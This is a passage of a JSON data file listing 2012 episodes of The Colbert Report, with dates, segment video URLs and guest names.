      "guest": "Rep. Nancy Pelosi"
    },
    {
      "date": "2012-02-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/g3b2me/arizona-gop-debate",
        "http://thecolbertreport.cc.com/videos/6wnf2j/posthumous-mormon-baptism",
        "http://thecolbertreport.cc.com/videos/zzgfft/wheat-thins-sponsortunity",
        "http://thecolbertreport.cc.com/videos/jshg47/placido-domingo"
      ],
      "guest": "Placido Domingo"
    },
    {
      "date": "2012-02-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6llqzw/mitt-romney-s---rick-santorum-s-michigan-campaigns",
        "http://thecolbertreport.cc.com/videos/45yrtw/peggielene-bartels",
        "http://thecolbertreport.cc.com/videos/xr2dmf/sign-off---goodnight"
      ],
      "guest": "Peggielene Bartels"
    },
    {
      "date": "2012-02-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/l484x8/intro---2-28-12",
        "http://thecolbertreport.cc.com/videos/b44eo3/the-colbert-report-s-1000th-show",
        "http://thecolbertreport.cc.com/videos/hsyhov/rising-oil-prices---john-kilduff",
        "http://thecolbertreport.cc.com/videos/gqa08a/mr--smith-goes-to-the-state-legislature--then-later-possibly-washington---bob-morris---kyle-jones",
        "http://thecolbertreport.cc.com/videos/0xatad/ross-eisenbrey",
        "http://thecolbertreport.cc.com/videos/8ebxgr/stephen-s-1000th-ticket"
      ],
      "guest": "Ross Eisenbrey"
    },
    {
      "date": "2012-02-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ueosv6/intro---2-29-12",
        "http://thecolbertreport.cc.com/videos/y0ejfo/countdown-to-loving-mitt",
        "http://thecolbertreport.cc.com/videos/3dllp7/the-word---change-we-can-believe-in",
        "http://thecolbertreport.cc.com/videos/3adb3i/tip-wag---kansas--male-birth-control-pill---new-york-s-babyccino",
        "http://thecolbertreport.cc.com/videos/puth71/william-shatner",
        "http://thecolbertreport.cc.com/videos/dhcxcx/sign-off---goodnight"
      ],
      "guest": "William Shatner"
    },
    {
      "date": "2012-03-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ueosv6/intro---2-29-12",
        "http://thecolbertreport.cc.com/videos/y0ejfo/countdown-to-loving-mitt",
        "http://thecolbertreport.cc.com/videos/3dllp7/the-word---change-we-can-believe-in",
        "http://thecolbertreport.cc.com/videos/3adb3i/tip-wag---kansas--male-birth-control-pill---new-york-s-babyccino",
        "http://thecolbertreport.cc.com/videos/puth71/william-shatner",
        "http://thecolbertreport.cc.com/videos/dhcxcx/sign-off---goodnight"
      ],
      "guest": "Claire Danes"
    },
    {
      "date": "2012-03-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/eolisf/countdown-to-loving-mitt---jeb-bush",
        "http://thecolbertreport.cc.com/videos/bf1ekb/people-who-are-destroying-america---teachers",
        "http://thecolbertreport.cc.com/videos/ncu1ti/mysteries-of-the-ancient-unknown---yo-mama-jokes",
        "http://thecolbertreport.cc.com/videos/tw0ear/claire-danes",
        "http://thecolbertreport.cc.com/videos/4gz8ak/sign-off---jeb-bush-s-portrait"
      ],
      "guest": "Claire Danes"
    },
    {
      "date": "2012-03-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xceapv/countdown-to-loving-mitt---super-tuesday",
        "http://thecolbertreport.cc.com/videos/29dn96/rush-limbaugh-apologizes-to-sandra-fluke",
        "http://thecolbertreport.cc.com/videos/pww7ru/sport-report---pete-weber--danica-patrick---the-new-orleans-saints",
        "http://thecolbertreport.cc.com/videos/nwk5lf/audra-mcdonald"
      ],
      "guest": "Audra McDonald"
    },
    {
      "date": "2012-03-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4yvx5w/super-tuesday-party--putin-s-win---india-s-state-assembly",
        "http://thecolbertreport.cc.com/videos/nzr8wl/the-word---due-or-die",
        "http://thecolbertreport.cc.com/videos/rxyz0z/thought-for-food---responsible-snacking---second-breakfast",
        "http://thecolbertreport.cc.com/videos/h24vfx/jonathan-safran-foer",
        "http://thecolbertreport.cc.com/videos/em4ksp/sign-off---good-catch"
      ],
      "guest": "Jonathan Safran Foer"
    },
    {
      "date": "2012-03-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/i93vkc/intro---3-7-12",
        "http://thecolbertreport.cc.com/videos/3df60s/higgs-boson-humor",
        "http://thecolbertreport.cc.com/videos/y5rjly/countdown-to-loving-mitt---super-tuesday-results",
        "http://thecolbertreport.cc.com/videos/7v4ikl/cyber-republican-convention",
        "http://thecolbertreport.cc.com/videos/ciyqhs/iranian-irony-threat",
        "http://thecolbertreport.cc.com/videos/060vqq/willem-dafoe",
        "http://thecolbertreport.cc.com/videos/c0qp1t/sign-off---goodnight"
      ],
      "guest": "Willem Dafoe"
    },
    {
      "date": "2012-03-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3nl0qx/eric-bolling-s-secret-gas-prices-plan",
        "http://thecolbertreport.cc.com/videos/fig5ri/herman-cain-s-avant-garde-pac-ad"
      ],
      "guest": "Don Fleming, Elvis Costello, Emmylou Harris"
    },
    {
      "date": "2012-03-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/c4fdt8/daylight-savings-socialism",
        "http://thecolbertreport.cc.com/videos/2v3qmo/republicans--southern-strategy",
        "http://thecolbertreport.cc.com/videos/lo9wk9/republicans--southern-strategy---dave--mudcat--saunders",
        "http://thecolbertreport.cc.com/videos/16w3vh/cheating-death---bacon-cure-for-nosebleeds---sound-wave-sterility",
        "http://thecolbertreport.cc.com/videos/nmtsxp/katherine-boo",
        "http://thecolbertreport.cc.com/videos/owkzk2/sign-off---goodnight-with-a-smile"
      ],
      "guest": "Katherine Boo"
    },
    {
      "date": "2012-03-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/bz7jdm/who-s-not-honoring-me-now----seattle-s-pop-conference",
        "http://thecolbertreport.cc.com/videos/qn0q26/threatdown---stoned-pat-robertson--muslim-american-reality-tv---pampered-bears",
        "http://thecolbertreport.cc.com/videos/h98570/republican-southern-primary---simplified-speeches",
        "http://thecolbertreport.cc.com/videos/msz5qh/andrew-bird"
      ],
      "guest": "Andrew Bird"
    },
    {
      "date": "2012-03-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/m77cwc/greg-smith-s-goldman-sachs-op-ed",
        "http://thecolbertreport.cc.com/videos/rwxeui/republican-southern-primary---rick-santorum-against-teleprompters",
        "http://thecolbertreport.cc.com/videos/yeczkv/republican-southern-primary---kermit-the-frog",
        "http://thecolbertreport.cc.com/videos/7n8gsd/monkey-on-the-lam---alabama",
        "http://thecolbertreport.cc.com/videos/zkum1o/mark-mckinnon",
        "http://thecolbertreport.cc.com/videos/d8t6uu/sign-off---goodnight"
      ],
      "guest": "Mark McKinnon"
    },
    {
      "date": "2012-03-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/eq8308/airport-security-for-senior-citizens",
        "http://thecolbertreport.cc.com/videos/zjy3q9/rush-limbaugh-loses-more-sponsors",
        "http://thecolbertreport.cc.com/videos/krx9gw/rick-santorum-visits-puerto-rico-and-speaks-from-his-heart",
        "http://thecolbertreport.cc.com/videos/vh5p5b/ireland-s-imported-sperm---ethnically-accurate-headgear",
        "http://thecolbertreport.cc.com/videos/8o29gb/dexter-filkins",
        "http://thecolbertreport.cc.com/videos/e66q9g/sign-off---goodnight"
      ],
      "guest": "Dexter Filkins"
    },
    {
      "date": "2012-03-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/no5p1a/exclusive---david-page-extended-interview",
        "http://thecolbertreport.cc.com/videos/a8lnqt/intro---3-26-12",
        "http://thecolbertreport.cc.com/videos/3ejcul/stephen-s-spring-break",
        "http://thecolbertreport.cc.com/videos/008ndt/the-word---dressed-to-kill",
        "http://thecolbertreport.cc.com/videos/7faawr/mitt-romney-etch-a-sketch-comparison",
        "http://thecolbertreport.cc.com/videos/rc1xqe/david-page",
        "http://thecolbertreport.cc.com/videos/20xgt7/sign-off---goodnight"
      ],
      "guest": "Dr. David Page"
    },
    {
      "date": "2012-03-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rk3w4e/intro---3-27-12",
        "http://thecolbertreport.cc.com/videos/cua8o6/barack-obama-gun-control-conspiracy",
        "http://thecolbertreport.cc.com/videos/ykhpki/tip-wag---anti-prejudice-drug---dick-cheney-s-heart",
        "http://thecolbertreport.cc.com/videos/53yh09/thought-for-food---tacocopter",
        "http://thecolbertreport.cc.com/videos/ghn5jt/charles-murray",
        "http://thecolbertreport.cc.com/videos/y9plha/sign-off---goodnight"
      ],
      "guest": "Charles Murray"
    },
    {
      "date": "2012-03-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lg7nrp/the-supreme-court-weighs-in-on-obamacare",
        "http://thecolbertreport.cc.com/videos/svf90k/the-supreme-court-weighs-in-on-obamacare---emily-bazelon",
        "http://thecolbertreport.cc.com/videos/tnvz1z/the-conservative-teen",
        "http://thecolbertreport.cc.com/videos/bmkpwj/mark-ruffalo",
        "http://thecolbertreport.cc.com/videos/jjebsm/sign-off---goodnight-snack"
      ],
      "guest": "Mark Ruffalo"
    },
    {
      "date": "2012-03-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7erwuh/stephen-offers-colbert-super-pac-super-fun-pack",
        "http://thecolbertreport.cc.com/videos/9bgxui/intro---3-29-12",
        "http://thecolbertreport.cc.com/videos/nuvo4m/the-mega-millions-lottery",
        "http://thecolbertreport.cc.com/videos/7qagdx/colbert-super-pac---texan-supporters---super-fun-pack",
        "http://thecolbertreport.cc.com/videos/2m6prp/mitt-romney-tells-a-funny-story",
        "http://thecolbertreport.cc.com/videos/7dpy0t/peter-beinart",
        "http://thecolbertreport.cc.com/videos/r5oifs/sign-off---colbert-super-pac-super-fun-pack"
      ],
      "guest": "Peter Beinart"
    },
    {
      "date": "2012-04-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8f8tya/intro---4-2-12",
        "http://thecolbertreport.cc.com/videos/1nq1ce/colbert-super-pac---super-fun-pack-treasure-hunt",
        "http://thecolbertreport.cc.com/videos/1bsxs9/the-beefstate-governors",
        "http://thecolbertreport.cc.com/videos/fmif88/yahweh-or-no-way---christian-card-counters--pope-benedict-on-marxism---pope-cologne",
        "http://thecolbertreport.cc.com/videos/5yl006/gary-johnson",
        "http://thecolbertreport.cc.com/videos/77h3h1/sign-off---goodnight"
      ],
      "guest": "Gov. Gary Johnson"
    },
    {
      "date": "2012-04-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/33j3ar/lftb-colbology",
        "http://thecolbertreport.cc.com/videos/z52jo4/colbert-super-pac---super-fun-pack-not-legal-advice---certificate-of-presidenthood",
        "http://thecolbertreport.cc.com/videos/v3p6ss/colbert-super-pac-shh----501c4-disclosure",
        "http://thecolbertreport.cc.com/videos/ag45p1/colbert-super-pac-shh----501c4-disclosure---trevor-potter",
        "http://thecolbertreport.cc.com/videos/y4berw/rick-santorum-speaks-from-his-heart---california-colleges",
        "http://thecolbertreport.cc.com/videos/1b9vpb/nikki-haley",
        "http://thecolbertreport.cc.com/videos/asl5su/sign-off---helmeted-ham-rove"
      ],
      "guest": "Gov. Nikki Haley"
    },
    {
      "date": "2012-04-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2ihe55/intro---4-4-12",
        "http://thecolbertreport.cc.com/videos/6y1ct4/peabody-award-for-colbert-super-pac",
        "http://thecolbertreport.cc.com/videos/4io3p9/settling-for-mitt-romney",
        "http://thecolbertreport.cc.com/videos/x8e4ps/colbert-super-pac---republicans---the-latino-vote",
        "http://thecolbertreport.cc.com/videos/6ml3sk/wilford-brimley-calls---quaker-oats-makeover",
        "http://thecolbertreport.cc.com/videos/plj4a3/robert-ballard",
        "http://thecolbertreport.cc.com/videos/qyyf0b/sign-off---second-peabody-award"
      ],
      "guest": "Robert D. Ballard"
    },
    {
      "date": "2012-04-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/om9vmg/bad-news-about-good-unemployment-news",
        "http://thecolbertreport.cc.com/videos/lnmh56/colbert-s-very-wanted---manatee-mailbox",
        "http://thecolbertreport.cc.com/videos/0u9fik/dirt-bike-badass-in-the-lincoln-tunnel",
        "http://thecolbertreport.cc.com/videos/ji5xxu/anne-rice",
        "http://thecolbertreport.cc.com/videos/si0xcn/sign-off---lincoln-tunnel"
      ],
      "guest": "Anne Rice"
    },
    {
      "date": "2012-04-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8ziziz/easter-under-attack---bunny-vs--bilby",
        "http://thecolbertreport.cc.com/videos/oyaen8/searching-for-mr--right---mitt-romney---iowa-s-steve-king",
        "http://thecolbertreport.cc.com/videos/csp74m/stephen-colbert-s-shame-spiral---senior-citizen-gymnasts",
        "http://thecolbertreport.cc.com/videos/kruk2j/bob-lutz",
        "http://thecolbertreport.cc.com/videos/9wc34u/sign-off---remembering-mike-wallace"
      ],
      "guest": "Bob Lutz"
    },
    {
      "date": "2012-04-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2n6qw1/intro---4-10-12",
        "http://thecolbertreport.cc.com/videos/82ub2z/rick-santorum-leaves-presidential-race",
        "http://thecolbertreport.cc.com/videos/qu7492/i-got-the-tweets-like-grassley",
        "http://thecolbertreport.cc.com/videos/3la5nh/tip-wag---coal-industry-crackdown---box-spring-bunker",
        "http://thecolbertreport.cc.com/videos/mfxyfn/stephen-colbert-s-lady-heroes---glen-grothman",
        "http://thecolbertreport.cc.com/videos/o4ah40/richard-hersh",
        "http://thecolbertreport.cc.com/videos/es5mrc/sign-off---goodnight"
      ],
      "guest": "Richard Hersh"
    },
    {
      "date": "2012-04-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3ygjj0/amped-up-for-michelle-obama",
        "http://thecolbertreport.cc.com/videos/bc3gqm/the-word---whuh-how-",
        "http://thecolbertreport.cc.com/videos/ingur1/employing-a-veteran---sergeant-bryan-escobedo",
        "http://thecolbertreport.cc.com/videos/f8r4k5/michelle-obama-pt--1",
        "http://thecolbertreport.cc.com/videos/v3wlgc/michelle-obama-pt--2",
        "http://thecolbertreport.cc.com/videos/u0cci1/sign-off---goodnight"
      ],
      "guest": "Michelle Obama"
    },
    {
      "date": "2012-04-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/pzrkzg/intro---4-12-12",
        "http://thecolbertreport.cc.com/videos/m5gmsh/the-other-war-on-women",
        "http://thecolbertreport.cc.com/videos/v73czf/stephen-colbert-s-end-of-the-world-of-the-week---survivalist-singles---tsunami-food",
        "http://thecolbertreport.cc.com/videos/s55d89/cold-war-update---alleged-congressional-communists",
        "http://thecolbertreport.cc.com/videos/x9epzo/james-cameron",
        "http://thecolbertreport.cc.com/videos/avonwu/sign-off---goodnight"
      ],
      "guest": "James Cameron"
    },
    {
      "date": "2012-04-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/z2fjas/a-beautiful-war-for-women-segment",
        "http://thecolbertreport.cc.com/videos/2ixpov/secret-service-sex-scandal",
        "http://thecolbertreport.cc.com/videos/ilt6wv/a-beautiful-war-for-women",
        "http://thecolbertreport.cc.com/videos/44j8wl/newt-gingrich---gun-rights",
        "http://thecolbertreport.cc.com/videos/ru5vnr/bonnie-raitt"
      ],
      "guest": "Bonnie Raitt"
    },
    {
      "date": "2012-04-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wpng4g/intro---4-17-12",
        "http://thecolbertreport.cc.com/videos/gxlf9b/mitt-romney-s-dinner-table-pranks",
        "http://thecolbertreport.cc.com/videos/sfsf06/thought-for-food---bug-food-coloring--hot-dog-stuffed-crust---drugged-poultry",
        "http://thecolbertreport.cc.com/videos/vklngm/gsa-spending-scandal",
        "http://thecolbertreport.cc.com/videos/6fhp9q/jonah-lehrer",
        "http://thecolbertreport.cc.com/videos/culsks/sign-off---goodnight"
      ],
      "guest": "Jonah Lehrer"
    },
    {
      "date": "2012-04-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/q3i7x8/intro---4-18-12",
        "http://thecolbertreport.cc.com/videos/ddq41n/searching-for-mr--right---mitt-romney---ohio-s-rob-portman",
        "http://thecolbertreport.cc.com/videos/er0kn7/the-word---gateway-hug",
        "http://thecolbertreport.cc.com/videos/vw1qdm/stephen-colbert-s-end-of-the-world-of-the-week---doomsday-preppers",
        "http://thecolbertreport.cc.com/videos/xzzk73/arianna-huffington",
        "http://thecolbertreport.cc.com/videos/tttdob/sign-off---goodnight-kiss"
      ],
      "guest": "Arianna Huffington"
    },
    {
      "date": "2012-04-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hrfl05/intro---4-19-12",
        "http://thecolbertreport.cc.com/videos/a9n2pr/stephen-s-4-20-message",
        "http://thecolbertreport.cc.com/videos/zdgaqc/alpha-dog-of-the-week---cory-booker",
        "http://thecolbertreport.cc.com/videos/nb2ksl/the-enemy-within---bologna-border-bust",
        "http://thecolbertreport.cc.com/videos/uio9bo/time-s-2012-top-100-most-influential",
        "http://thecolbertreport.cc.com/videos/h2p67e/tavis-smiley---cornel-west",
        "http://thecolbertreport.cc.com/videos/g291q8/sign-off---time-s-top-100"
      ],
      "guest": "Tavis Smiley &amp; Cornel West"
    },
    {
      "date": "2012-04-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4wypj5/intro---4-23-12",
        "http://thecolbertreport.cc.com/videos/m8blpo/steve-doocy-s-silver-spoon-subtext-reporting",
        "http://thecolbertreport.cc.com/videos/2gwl1y/tip-wag--pheromone-parties---arizona-s--pre-life--laws",
        "http://thecolbertreport.cc.com/videos/v2y3wl/mitt-romney-s-picnic-gaffe",
        "http://thecolbertreport.cc.com/videos/14wyxm/don-mcleroy",
        "http://thecolbertreport.cc.com/videos/l9d2q6/sign-off---goodnight"
      ],
      "guest": "Don McLeroy"
    },
    {
      "date": "2012-04-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ly3so2/super-tuesday-ii--election-boogaloo---death-match-in-hellaware",
        "http://thecolbertreport.cc.com/videos/xmivrq/-i-am-a-pole--and-so-can-you---",
        "http://thecolbertreport.cc.com/videos/i4eh7r/canada-s-currency-coup",
        "http://thecolbertreport.cc.com/videos/ycnifi/magnus-carlsen",
        "http://thecolbertreport.cc.com/videos/cfkek7/sign-off---ipad"
      ],
      "guest": "Magnus Carlsen"
    },
    {
      "date": "2012-04-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/et0kro/intro---4-25-12",
        "http://thecolbertreport.cc.com/videos/or4jr5/nasa-retires-discovery---drops-spacebook",
        "http://thecolbertreport.cc.com/videos/6xkuod/the-word---united-we-can-t-stand-them",
        "http://thecolbertreport.cc.com/videos/gi36k3/cheating-death---crash-diet-feeding-tubes---scrotum-gel-injections",
        "http://thecolbertreport.cc.com/videos/88pieq/michael-sandel",
        "http://thecolbertreport.cc.com/videos/wduflz/sign-off---goodnight"
      ],
      "guest": "Michael Sandel"
    },
    {
      "date": "2012-04-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xrzvpm/intro---4-26-12",
        "http://thecolbertreport.cc.com/videos/9rs6oa/barack-obama-s-slow-jam-backlash",
        "http://thecolbertreport.cc.com/videos/2w9amu/colbert-super-pac---super-fun-pack-1st-treasure-hunt-clue",
        "http://thecolbertreport.cc.com/videos/1ytfce/jack-white",
        "http://thecolbertreport.cc.com/videos/kymj2z/sign-off---montclair-film-festival"
      ],
      "guest": "Jack White"
    },
    {
      "date": "2012-04-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/l8r5un/intro---4-30-12",
        "http://thecolbertreport.cc.com/videos/u2x3gk/delicate-advice-for-chen-guangcheng",
        "http://thecolbertreport.cc.com/videos/g6gv3q/the-word---don-t-ask--don-t-show---tell",
        "http://thecolbertreport.cc.com/videos/z2rpip/concealing-weapons-in-style",
        "http://thecolbertreport.cc.com/videos/csg3jo/diane-keaton",
        "http://thecolbertreport.cc.com/videos/tly3vi/sign-off---stephen-s-fashionable-firearm"
      ],
      "guest": "Diane Keaton"
    },
    {
      "date": "2012-05-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8gt820/intro---5-1-12",
        "http://thecolbertreport.cc.com/videos/pktymf/barack-obama---the-anniversary-of-bin-laden-s-assassination",
        "http://thecolbertreport.cc.com/videos/0zj7f4/paul-ryan-s-christian-budget-cuts",
        "http://thecolbertreport.cc.com/videos/7af7jl/paul-ryan-s-christian-budget-cuts---thomas-reese",
        "http://thecolbertreport.cc.com/videos/cpb2np/carne-ross",
        "http://thecolbertreport.cc.com/videos/a9ioqx/sign-off---goodnight"
      ],
      "guest": "Carne Ross"
    },
    {
      "date": "2012-05-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/jciyto/intro---5-2-12",
        "http://thecolbertreport.cc.com/videos/n232ru/richard-branson-shaped-ice-cubes",
        "http://thecolbertreport.cc.com/videos/goj2h9/the-word---debt-panels",
        "http://thecolbertreport.cc.com/videos/sv3iag/kermit-the-frog-s-german-tv-offense---hans-beinholtz",
        "http://thecolbertreport.cc.com/videos/luw0ia/jonathan-haidt",
        "http://thecolbertreport.cc.com/videos/k7vmo6/sign-off---stephen-colbert-s-6000k-norway-norwalkathon"
      ],
      "guest": "Jonathan Haidt"
    },
    {
      "date": "2012-05-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/msaxn6/newt-gingrich---mitt-romney-alliance-analogies",
        "http://thecolbertreport.cc.com/videos/eki0dc/colbert-super-pac---in-search-of-mr--larose",
        "http://thecolbertreport.cc.com/videos/2v2ixr/who-s-honoring-me-now----national-space-society---buzz-aldrin",
        "http://thecolbertreport.cc.com/videos/z3ac6o/lena-dunham",
        "http://thecolbertreport.cc.com/videos/1iw8uv/sign-off---2012-space-pioneer-award-for-mass-media"
      ],
      "guest": "Lena Dunham"
    },
    {
      "date": "2012-05-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1jhhu2/uncensored---maurice-sendak-tribute----i-am-a-pole--and-so-can-you----release",
        "http://thecolbertreport.cc.com/videos/feswk7/intro---5-7-12",
        "http://thecolbertreport.cc.com/videos/d6nh6o/hand-disinfectant-drunk-teens",
        "http://thecolbertreport.cc.com/videos/d69ur0/joe-biden-s-same-sex-marriage-gaffe",
        "http://thecolbertreport.cc.com/videos/fplvtb/-pussy-hound--with-eric-mccormack",
        "http://thecolbertreport.cc.com/videos/jrnml0/threatdown---newscasting-bears",
        "http://thecolbertreport.cc.com/videos/u65qci/andy-cohen",
        "http://thecolbertreport.cc.com/videos/xh5269/sign-off---sound-effects-box"
      ],
      "guest": "Andy Cohen"
    },
    {
      "date": "2012-05-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/p05t1b/colbert-super-pac-shh----corporate-campaign-players---super-secret--spooky-pacs-",
        "http://thecolbertreport.cc.com/videos/b2tfg8/anonymous-attack-ads---claire-mccaskill",
        "http://thecolbertreport.cc.com/videos/ad10bn/michelle-alexander",
        "http://thecolbertreport.cc.com/videos/dsprai/sign-off----i-am-a-pole--and-so-can-you---"
      ],
      "guest": "Michelle Alexander"
    },
    {
      "date": "2012-05-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/v1k3ci/mexico-s-debate-playmate",
        "http://thecolbertreport.cc.com/videos/b6tiga/barack-obama-vs--north-carolina-on-gay-marriage",
        "http://thecolbertreport.cc.com/videos/t3omhb/jon-mcnaughton-s--nation-under-socialism--artwork",
        "http://thecolbertreport.cc.com/videos/o2c49w/anna-wintour",
        "http://thecolbertreport.cc.com/videos/bogip6/sign-off----i-am-a-pole--and-so-can-you----audiobook"
      ],
      "guest": "Anna Wintour"
    },
    {
      "date": "2012-05-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6cwgo2/intro---5-10-12",
        "http://thecolbertreport.cc.com/videos/7lnqh4/mother-s-day-shout-out",
        "http://thecolbertreport.cc.com/videos/n27g4x/barack-obama-s-gay-blasphemy",
        "http://thecolbertreport.cc.com/videos/b9m4e5/threatdown---interdimensional-black-people--gay-strokes---manipulative-sicko-monkeys",
        "http://thecolbertreport.cc.com/videos/ytlc6i/wisconsin-s-fake-democrats",
        "http://thecolbertreport.cc.com/videos/v6gyoh/francis-collins",
        "http://thecolbertreport.cc.com/videos/vbl44w/sign-off---two-weeks-off---dry-roasted-peanuts"
      ],
      "guest": "Dr. Francis Collins"
    },
    {
      "date": "2012-05-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hx8ph7/intro---5-29-12",
        "http://thecolbertreport.cc.com/videos/cpgg7x/who-s-honoring-me-now----peabody-awards---maxim-s-hot-100",
        "http://thecolbertreport.cc.com/videos/oo0mhd/donald-trump-s-creative-truth---mitt-romney-s-poll-numbers",
        "http://thecolbertreport.cc.com/videos/cw4fxf/un-american-news---egypt-s-presidential-elections",
        "http://thecolbertreport.cc.com/videos/32y78g/charlize-theron",
        "http://thecolbertreport.cc.com/videos/gr0i67/sign-off---goodnight"
      ],
      "guest": "Charlize Theron"
    },
    {
      "date": "2012-05-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/u7h1f8/intro---5-30-12",
        "http://thecolbertreport.cc.com/videos/kydmtj/mexico-s-drug---potato-chip-wars",
        "http://thecolbertreport.cc.com/videos/s73hgy/robert-mugabe-s-u-n--tourism-tribute",
        "http://thecolbertreport.cc.com/videos/dfm2k1/alan-alda",
        "http://thecolbertreport.cc.com/videos/b6lw83/sign-off---stephen-s-matchbox"
      ],
      "guest": "Alan Alda"
    },
    {
      "date": "2012-05-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/y3bfh6/buy-best-selling--i-am-a-pole--and-so-can-you---",
        "http://thecolbertreport.cc.com/videos/sib2qy/barack-obama-s-righteous-drone-strikes",
        "http://thecolbertreport.cc.com/videos/s3t2y6/the-word---two-birds-with-one-drone",
        "http://thecolbertreport.cc.com/videos/pufh72/michael-bloomberg-s-super-sized-soda-scheme",
        "http://thecolbertreport.cc.com/videos/pz3adl/jack-hitt",
        "http://thecolbertreport.cc.com/videos/e9e1b2/sign-off---welcome-baby-gwinn-"
      ],
      "guest": "Jack Hitt"
    },
    {
      "date": "2012-06-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nhsal8/juvenile-speeches-from-congress---president-sparkle-talk",
        "http://thecolbertreport.cc.com/videos/w6itwj/the-word---sink-or-swim",
        "http://thecolbertreport.cc.com/videos/r7x6me/better-know-a-district---represent-o-map-6000---georgia-s-5th",
        "http://thecolbertreport.cc.com/videos/cx6fmy/john-lewis",
        "http://thecolbertreport.cc.com/videos/5u46bt/sign-off---goodnight"
      ],
      "guest": "Rep. John Lewis"
    },
    {
      "date": "2012-06-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lg5ugg/intro---6-5-12",
        "http://thecolbertreport.cc.com/videos/xt64qc/cdc-zombie-apocalypse-statement",
        "http://thecolbertreport.cc.com/videos/w4utag/tip-wag---japanese-diet-goggles--u-s--sperm-exports---taxidermied-toys",
        "http://thecolbertreport.cc.com/videos/kkce78/self-marriage-problems",
        "http://thecolbertreport.cc.com/videos/90ifev/jill-biden",
        "http://thecolbertreport.cc.com/videos/hhgz9k/sign-off---goodnight"
      ],
      "guest": "Jill Biden"
    },
    {
      "date": "2012-06-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ta5d10/transit-of-venus---mars-reality-show-pitch",
        "http://thecolbertreport.cc.com/videos/y1zpiy/wisconsin-s-recall-results",
        "http://thecolbertreport.cc.com/videos/0vve8r/difference-makers---larry-johnson",
        "http://thecolbertreport.cc.com/videos/pqv8yf/neil-patrick-harris",
        "http://thecolbertreport.cc.com/videos/1n5kn0/sign-off---ray-bradbury-tribute"
      ],
      "guest": "Neil Patrick Harris"
    },
    {
      "date": "2012-06-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2l9h7f/intro---6-7-12",
        "http://thecolbertreport.cc.com/videos/n107py/corruption-on-pakistan-s--sesame-street-",
        "http://thecolbertreport.cc.com/videos/5zzgas/the-new-york-times--hit-job-on-mitt-romney",
        "http://thecolbertreport.cc.com/videos/mlqu18/a-teacup-pig---partisan-politics",
        "http://thecolbertreport.cc.com/videos/gfpnqx/regina-spektor",
        "http://thecolbertreport.cc.com/videos/8x9qre/colbert-super-pac---super-fun-pack-treasure-hunt-clue"
      ],
      "guest": "Regina Spektor"
    },
    {
      "date": "2012-06-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8zxgdh/neil-degrasse-tyson-on--prometheus--gaffe",
        "http://thecolbertreport.cc.com/videos/4dkvt6/radical-feminist-nuns",
        "http://thecolbertreport.cc.com/videos/u1f5qa/radical-feminist-nuns---simone-campbell",
        "http://thecolbertreport.cc.com/videos/beuiqq/-banana-bunker--tutorial",
        "http://thecolbertreport.cc.com/videos/0lbz7s/martin-sheen",
        "http://thecolbertreport.cc.com/videos/h1jqol/sign-off---wooden-ruler"
      ],
      "guest": "Martin Sheen"
    },
    {
      "date": "2012-06-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/syl8av/intro---6-12-12",
        "http://thecolbertreport.cc.com/videos/4p817x/mitt-romney-s-blue-collar-equestrian-pastime",
        "http://thecolbertreport.cc.com/videos/nu56lh/barack-obama-s-anti-terror-leaks",
        "http://thecolbertreport.cc.com/videos/dfjz7v/barack-obama-s-jobs-gaffe---mitt-romney-s-courageous-comeback",
        "http://thecolbertreport.cc.com/videos/e4m68b/operation-artificial-swedener",
        "http://thecolbertreport.cc.com/videos/eici19/will-allen",
        "http://thecolbertreport.cc.com/videos/uaovz2/sign-off---stephen-s-equestrian-display"
      ],
      "guest": "Will Allen"
    },
    {
      "date": "2012-06-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/f93cwg/high-wire-walk-over-niagara-falls",
        "http://thecolbertreport.cc.com/videos/e61ypw/the-word---free-lunch",
